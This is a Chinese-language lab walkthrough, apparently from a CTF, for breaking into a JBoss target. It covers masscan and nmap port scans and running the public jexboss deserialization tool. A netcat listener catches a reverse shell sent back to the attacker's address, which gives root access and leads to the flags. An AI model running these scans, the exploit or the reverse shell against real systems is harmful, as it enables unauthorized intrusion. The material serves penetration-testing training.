靶机渗透之JexBoss-Joss
JexBoss-Jboss靶机渗透实战
实验步骤
(1)信息收集-端口扫描
1.扫描端口(masscan)
masscan –rate=10000 –ports 0-65535 192.168.7.30
masscan –rate=每秒多少个数据包 –ports 端口范围 IP地址/IP地址段
Masscan扫描速度快,为了防止漏扫,可以多扫描几次;
2.扫描端口的详细信息(nmap)
nmap -sV -T4 192.168.7.30
nmap -sV -T4 -A 192.168.7.30
- 其中:-T4指定扫描过程中使用的时序(分为0-5等级);
- -sV扫描版本的信息和开启的服务;
- 也可以选择带-A参数,详细扫描开放端口的具体服务;
- 与masscan相比,namp更详细,但是速度较慢(可以通过masscan快速扫描,再使用nmap扫描具体开放的端口)
(2)渗透测试
经过上面的信息发现开启了80,22,8080,3389端口,在浏览器中访问8080端口,发现为Jboss搭建网站,如图所示
尝试使用Jboss反序列化脚本,在kali攻击中输入git clone https://github.com/joaomatosf/jexboss.git克隆脚本,如图所示
输入cd jexboss,进入jexboss工具目录,输入pip install -r requires.txt命令,进行安装,如图所示
如果未能执行pip命令,参照
提前进行端口的监听,输入命令nc –lvp 1234,监听1234端口。如图所示
运行脚本,执行攻击命令python jexboss.py -host http://192.168.7.30:8080其中,192.168.7.30为靶机地址。如图所示。
在弹出的第一个选项中,选择【no】,如图所示
在弹出的第二个选项中,选择【yes】,如图所示
在【IP Address】项填写172.16.11.51(攻击机地址),【Port】填写1234.输入回车确定。如图所示
回到之前开启的监听端口菜单,可以看到,反弹shell成功,拥有root权限。如图所示
在根目录找到第一个flag
在/home目录寻找第二个flag